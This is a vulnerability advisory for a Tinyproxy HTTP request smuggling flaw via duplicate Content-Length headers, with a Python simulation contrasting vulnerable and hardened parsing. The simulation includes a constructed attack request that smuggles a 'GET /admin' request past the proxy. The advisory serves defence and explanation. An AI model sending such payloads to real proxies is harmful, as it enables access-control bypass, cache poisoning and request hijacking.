CVE-2026-54388
Tinyproxy - HTTP Request Smuggling via Duplicate Content-Length Headers
Severity: CRITICAL
Title source: cnaDescription
Tinyproxy through 1.11.3, fixed in commit 364cdb6, fails to reject requests containing multiple Content-Length headers with differing values, forwarding all duplicate headers to the backend while using the first value to determine how many request body bytes to consume. Remote attackers can desynchronize the proxy and backend parser state, allowing injection of arbitrary HTTP requests to the backend to enable cache poisoning, access control bypass, and request hijacking.
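The framing mismatch described above, as an added illustration in Python. This is not Tinyproxy's code and does not reproduce the logic of commit 364cdb6: `vulnerable_proxy` models the pre-fix behaviour (body framed by the first Content-Length, every header forwarded), `backend_last_cl` models a backend that honours the last Content-Length, and `hardened_proxy` applies the RFC 9112 section 6.3 rule (differing duplicates are a 400-and-close error, identical duplicates collapse to one header). Hostnames, paths and the request bytes are constructed for the example.

```python
# Added example (not Tinyproxy code): simulation of the proxy/backend framing
# mismatch behind this advisory. The hardened check follows RFC 9112 s6.3 and is
# not the exact logic of commit 364cdb6. All HTTP messages are constructed.
from typing import List, Optional, Tuple

Headers = List[Tuple[str, str]]


def parse_head(raw: bytes) -> Tuple[str, Headers, bytes]:
    """Split a raw request into request line, (name, value) headers and the
    bytes after the blank line (the body plus anything that follows it)."""
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    lines = head.split(b"\r\n")
    headers: Headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().decode(), value.strip().decode()))
    return lines[0].decode(), headers, rest


def content_lengths(headers: Headers) -> List[int]:
    """All Content-Length values in order; name matched case-insensitively."""
    return [int(v) for n, v in headers if n.lower() == "content-length"]


def serialize(request_line: str, headers: Headers) -> bytes:
    return (request_line + "\r\n"
            + "".join(f"{n}: {v}\r\n" for n, v in headers) + "\r\n").encode()


def vulnerable_proxy(raw: bytes) -> Tuple[bytes, bytes]:
    """Pre-fix framing: consume the body per the FIRST Content-Length, forward
    every header unchanged (duplicates included). Returns (bytes sent to the
    backend, bytes left in the client buffer, which the proxy will later
    parse as the client's next request)."""
    request_line, headers, rest = parse_head(raw)
    lengths = content_lengths(headers)
    n = lengths[0] if lengths else 0
    return serialize(request_line, headers) + rest[:n], rest[n:]


def backend_last_cl(stream: bytes) -> List[Tuple[str, bytes]]:
    """A backend that honours the LAST Content-Length, one common way a second
    parser disagrees with the proxy. Returns (request line, body) for every
    request it carves out of the bytes delivered on one connection."""
    requests = []
    while stream:
        request_line, headers, rest = parse_head(stream)
        lengths = content_lengths(headers)
        n = lengths[-1] if lengths else 0
        requests.append((request_line, rest[:n]))
        stream = rest[n:]
    return requests


def hardened_proxy(raw: bytes) -> Optional[Tuple[bytes, bytes]]:
    """RFC 9112 s6.3: differing duplicate Content-Length values are a framing
    error; the caller answers 400 and closes the client connection (returned
    here as None). Identical duplicates are collapsed to a single header so
    the backend never sees the ambiguity either."""
    request_line, headers, rest = parse_head(raw)
    lengths = content_lengths(headers)
    if len(set(lengths)) > 1:
        return None
    clean = [(n, v) for n, v in headers if n.lower() != "content-length"]
    if lengths:
        clean.append(("Content-Length", str(lengths[0])))
    n = lengths[0] if lengths else 0
    return serialize(request_line, clean) + rest[:n], rest[n:]


# Constructed attacker request: the body declared by the first Content-Length
# is itself a complete request; the second Content-Length says "no body".
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: backend.test\r\n\r\n"
ATTACK = b"".join([
    b"POST /search HTTP/1.1\r\n",
    b"Host: backend.test\r\n",
    b"Content-Length: %d\r\n" % len(SMUGGLED),
    b"Content-Length: 0\r\n",
    b"\r\n",
    SMUGGLED,
])

# Constructed benign request carrying two identical Content-Length headers.
BENIGN = (b"POST /x HTTP/1.1\r\nHost: backend.test\r\n"
          b"Content-Length: 5\r\nContent-Length: 5\r\n\r\nhello")


def run_demo() -> dict:
    forwarded, leftover = vulnerable_proxy(ATTACK)
    return {
        "proxy_leftover": leftover,                 # b"": proxy swallowed it all
        "forwarded_cl_count": forwarded.count(b"Content-Length:"),
        "backend_saw": [line for line, _ in backend_last_cl(forwarded)],
        "hardened_attack": hardened_proxy(ATTACK),  # None: 400 and close
        "hardened_benign": hardened_proxy(BENIGN),
    }
```

Running `run_demo()` shows the proxy treating the whole 43-byte payload as the body of one POST, while the backend, using the last Content-Length of 0, sees two requests: the POST and a `GET /admin` that the proxy never parsed as a request, so none of its URL-based access controls applied to it. The attacker sizes the first Content-Length to the smuggled request exactly so that nothing is left in the proxy's client buffer. Whether the attack works against a given deployment depends on how the backend resolves the duplicate; some backends reject, some take the first value, some the last, and only a backend that disagrees with the proxy yields a desync. The hardened variant removes the dependency on backend behaviour by refusing conflicting values at the proxy and forwarding at most one Content-Length.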
References (4)
Technical Description (researcher issue report):
https://github.com/tinyproxy/tinyproxy/issues/609
Issue Tracking (maintainer pull request):
https://github.com/tinyproxy/tinyproxy/pull/610
Patch (fix commit):
https://github.com/tinyproxy/tinyproxy/commit/364cdb67e0ea00a8e4a7037e2693e0711e816adb
Third Party Advisory:
https://www.vulncheck.com/advisories/tinyproxy-http-request-smuggling-via-duplicate-content-length-headers
Scores
CVSS v3: 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
Attack Vector: NETWORK
EPSS: 0.0039 (percentile 30.1%)
CISA SSVC (Vulnrichment)
Exploitation: poc
Automatable: yes
Technical Impact: total
Details
CWE: CWE-444 (Inconsistent Interpretation of HTTP Requests, 'HTTP Request/Response Smuggling')
Status: published
Products (2)
tinyproxy/tinyproxy: < 1.11.3
tinyproxy/tinyproxy: fixed in commit 364cdb67e0ea00a8e4a7037e2693e0711e816adb
Published: Jun 17, 2026
Tracked Since: Jun 18, 2026